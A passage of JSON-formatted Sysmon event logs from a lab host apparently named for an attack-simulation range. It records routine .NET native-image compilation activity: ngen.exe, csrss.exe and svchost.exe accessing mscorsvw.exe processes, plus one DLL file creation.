08:06:33.959","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2289-5F25-0000-001015130F00}","TargetProcessId":"2124","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7791,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:33.959\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2289-5F25-0000-001015130F00}\r\nTargetProcessId: 2124\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:33.959","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2289-5F25-0000-001015130F00}","TargetProcessId":"2124","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7792,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:33.975\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2289-5F25-0000-001015130F00}\r\nTargetProcessId: 2124\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:33.975","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2289-5F25-0000-001015130F00}","TargetProcessId":"2124","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7793,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:34.022\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228A-5F25-0000-001076160F00}\r\nTargetProcessId: 2948\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:34.022","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228A-5F25-0000-001076160F00}","TargetProcessId":"2948","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7794,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:34.022\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228A-5F25-0000-001076160F00}\r\nTargetProcessId: 2948\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:34.022","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228A-5F25-0000-001076160F00}","TargetProcessId":"2948","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7795,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:34.022\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228A-5F25-0000-001076160F00}\r\nTargetProcessId: 2948\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:34.022","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228A-5F25-0000-001076160F00}","TargetProcessId":"2948","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7796,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:34.303\r\nProcessGuid: {41C8662E-228A-5F25-0000-001076160F00}\r\nProcessId: 2948\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b84-0\\System.Dynamic.dll\r\nCreationUtcTime: 2020-08-01 08:06:34.303","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:34.303","ProcessGuid":"{41C8662E-228A-5F25-0000-001076160F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b84-0\\System.Dynamic.dll","CreationUtcTime":"2020-08-01 08:06:34.303","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7797,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:34.334\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228A-5F25-0000-0010E9190F00}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:34.334","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228A-5F25-0000-0010E9190F00}","TargetProcessId":"4240","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7798,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:34.334\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228A-5F25-0000-0010E9190F00}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:34.334","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228A-5F25-0000-0010E9190F00}","TargetProcessId":"4240","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7799,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:34.350\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228A-5F25-0000-0010E9190F00}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 